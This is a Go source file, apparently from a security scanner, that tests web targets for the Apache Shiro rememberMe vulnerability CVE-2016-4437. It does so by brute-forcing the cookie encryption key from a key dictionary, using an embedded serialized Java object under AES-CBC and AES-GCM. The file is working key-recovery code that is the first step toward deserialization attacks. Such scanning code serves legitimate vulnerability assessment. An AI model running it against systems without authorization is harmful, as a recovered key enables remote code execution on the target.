/
CVE_2016_4437.go
105 lines (97 loc) · 3.63 KB
/
CVE_2016_4437.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
package shiro
import (
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/rand"
_ "embed"
"encoding/base64"
"fmt"
"github.com/google/uuid"
regexp "github.com/wasilibs/go-re2"
"github.com/yhy0/Jie/pkg/protocols/httpx"
"github.com/yhy0/logging"
"io"
"strings"
)
//go:embed dicts/keys.txt
var keys1 string
func init() {
if "" != keys1 {
keys1 = strings.TrimSpace(keys1)
keys = strings.Split(keys1, "\n")
} else {
logging.Logger.Println("Warning, unable to load into dicts/keys.txt")
}
}
var (
keys = []string{}
checkContentx = "rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA=="
)
func padding(plainText []byte, blockSize int) []byte {
n := blockSize - len(plainText)%blockSize
temp := bytes.Repeat([]byte{byte(n)}, n)
plainText = append(plainText, temp...)
return plainText
}
func aES_CBC_Encrypt(key []byte, Content []byte) string {
block, _ := aes.NewCipher(key)
Content = padding(Content, block.BlockSize())
iv, _ := uuid.New().MarshalBinary()
blockMode := cipher.NewCBCEncrypter(block, iv)
cipherText := make([]byte, len(Content))
blockMode.CryptBlocks(cipherText, Content)
return base64.StdEncoding.EncodeToString(append(iv[:], cipherText[:]...))
}
func aES_GCM_Encrypt(key []byte, Content []byte) string {
block, _ := aes.NewCipher(key)
nonce := make([]byte, 16)
io.ReadFull(rand.Reader, nonce)
aesgcm, _ := cipher.NewGCMWithNonceSize(block, 16)
ciphertext := aesgcm.Seal(nil, nonce, Content, nil)
return base64.StdEncoding.EncodeToString(append(nonce, ciphertext...))
}
func getkeylen(u string, indexlen int, rememberMe string, cookie string, client *httpx.Client) (int, error) {
var header = make(map[string]string, 1)
if cookie == "" {
cookie = "rememberMe"
}
header["Cookie"] = cookie + "=" + rememberMe
if req, err := client.Request(u, "GET", "", header); err == nil {
var SetCookieAll string
for i := range req.Header["Set-Cookie"] {
SetCookieAll += req.Header["Set-Cookie"][i]
}
if req.Header != nil {
counts := regexp.MustCompile(cookie+"=deleteMe").FindAllStringIndex(SetCookieAll, -1)
return len(counts), nil
}
} else {
return indexlen, err
}
return indexlen, nil
}
func CVE_2016_4437(u string, cookie string, client *httpx.Client) (key string, mode string) {
if indexlen, err := getkeylen(u, 0, "1", cookie, client); err == nil {
Content, _ := base64.StdEncoding.DecodeString(checkContentx)
for _, key = range keys {
logging.Logger.Debug("test key: ", key)
decodekey, _ := base64.StdEncoding.DecodeString(key)
RememberMe1 := aES_CBC_Encrypt(decodekey, Content) // AES CBC加密
RememberMe2 := aES_GCM_Encrypt(decodekey, Content) // AES GCM加密
if CBClen, err := getkeylen(u, indexlen, RememberMe1, cookie, client); err == nil {
if CBClen != indexlen {
logging.Logger.Infof(fmt.Sprintf("Found vuln Shiro CVE_2016_4437| URL: %s CBC-KEY: %s", u, key))
return key, "CBC"
}
}
if GCMlen, err := getkeylen(u, indexlen, RememberMe2, cookie, client); err == nil {
if GCMlen != indexlen {
logging.Logger.Infof(fmt.Sprintf("Found vuln Shiro CVE_2016_4437| URL: %s GCM-KEY: %s", u, key))
return key, "GCM"
}
}
}
}
return "", ""
}